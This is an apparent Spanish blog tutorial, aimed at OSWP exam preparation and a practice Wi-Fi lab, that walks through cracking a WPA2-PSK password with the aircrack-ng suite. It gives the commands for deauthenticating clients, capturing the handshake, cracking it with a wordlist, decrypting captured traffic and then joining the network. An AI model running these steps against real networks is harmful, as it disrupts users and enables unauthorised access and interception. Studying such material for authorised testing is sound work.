De Novato a OSWP: Crackeando Redes WPA2-PSK con Aircrack-ng

OffensivePosts
3 min readOct 6, 2023

Entorno usado para realizar las pruebas:
https://wifichallengelab.com/ de @r4ulcl

Aircrack-ng Suite es una colección de herramientas diseñada para auditar redes Wi-Fi. En este tutorial, nos enfocaremos en descifrar contraseñas de redes WPA y WPA2 que utilizan claves precompartidas, conocidas como PSK (Pre-Shared Key). PSK es un método de autenticación donde se utiliza una contraseña común en el punto de acceso y en el cliente para establecer una conexión segura.

Entender cómo funcionan las herramientas de auditoría de Wi-Fi no solo puede ser interesante, sino crucial para asegurar tu propia red. Esta guía te llevará paso a paso a través del proceso utilizando Aircrack-ng.

1. Preparando el Entorno

Antes de auditar, necesitas preparar tu sistema:

  • Matar Procesos Interferentes: Hay procesos que pueden interferir con la captura de paquetes, por lo que es recomendable detenerlos.
  • sudo airmon-ng check kill
  • Modo Monitor: Las tarjetas de red Wi-Fi tienen varios modos, como el modo cliente (conectarse a un router) y el modo monitor (escuchar paquetes). Necesitamos el modo monitor.
  • sudo airmon-ng start wlan0

2. Descubriendo Redes Cercanas con airodump-ng

airodump-ng permite visualizar todas las redes Wi-Fi cercanas, mostrando información crucial para el ataque.

Ejecuta:

sudo airodump-ng wlan0mon -c 1-200

Esto buscará redes en los canales 1 a 200. Verás una lista de redes, presta atención a:

  • BSSID: Es como la dirección física del router.
  • ESSID: El nombre visible de la red (por ejemplo, “MiRedFavorita”).
  • CH: El canal en el que opera la red.
  • ENC: El tipo de cifrado (WPA2, WEP, etc.).

3. Capturando el Handshake

El “handshake” es un paquete de datos intercambiado cuando un dispositivo se conecta a una red Wi-Fi. Es esencial para descifrar la contraseña.

Para capturarlo, selecciona tu red objetivo y ejecuta:

sudo airodump-ng -c [CANAL] -w [NOMBRE_ARCHIVO_SALIDA] --essid [NOMBRE_RED] --bssid [BSSID] wlan0mon

Esto guardará el handshake en un archivo cuando lo capture.

4. Desconectando Dispositivos para Capturar el Handshake

Para capturar el handshake más rápidamente, puedes desconectar temporalmente a todos los dispositivos de la red. Al reconectarse, enviarán un handshake que puedes capturar.

Desconecta a todos:

aireplay-ng -0 0 -a [BSSID] wlan0mon

O solo a un dispositivo específico:

aireplay-ng -0 0 -a [BSSID] -c [MAC_DEL_DISPOSITIVO] wlan0mon

5. Descifrando el Handshake

Usa una lista de palabras para intentar “adivinar” la contraseña:

aircrack-ng [NOMBRE_ARCHIVO_SALIDA.cap] -w [RUTA_WORDLIST]

Si la contraseña está en tu lista, ¡la encontrarás!

6. Decodificando el Tráfico con airdecap-ng

Si tienes la clave, puedes “traducir” el tráfico cifrado a un formato legible:

airdecap-ng -b [BSSID] -e [NOMBRE_RED] -p [CONTRASEÑA] [NOMBRE_ARCHIVO_SALIDA.cap]

7. Conectándose a la Red con wpa_supplicant

Una vez que hayas descifrado la contraseña de una red Wi-Fi, puedes conectarte a ella utilizando wpa_supplicant, una herramienta que gestiona la autenticación WPA y WPA2.

a. Crear el Archivo de Configuración

Primero, crea un archivo de configuración para wpa_supplicant con la información de la red:

nano /etc/wpa_supplicant/wpa_supplicant.conf

Añade la siguiente información, sustituyendo [SSID] por el nombre de la red y [CONTRASEÑA] por la contraseña descifrada:

network={
ssid="[SSID]"
psk="[CONTRASEÑA]"
key_mgmt=WPA-PSK
}

Guarda y cierra el archivo.

b. Iniciar wpa_supplicant

Ahora, utiliza wpa_supplicant para conectarte a la red:bashCopy code

sudo wpa_supplicant -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf -B

Aquí, -i wlan0 especifica la interfaz inalámbrica, -c /etc/wpa_supplicant/wpa_supplicant.conf apunta al archivo de configuración que acabas de crear y -B ejecuta wpa_supplicant en segundo plano (Opcional).

c. Obtener una Dirección IP

Para completar la conexión, solicita una dirección IP a través de DHCP:

sudo dhclient wlan0

¡Listo! Ahora deberías estar conectado a la red Wi-Fi usando wpa_supplicant.

--

--

OffensivePosts
0 Followers

Your gateway to the art of pentesting. Discover, learn, and master the tactics of ethical hacking with a seasoned expert.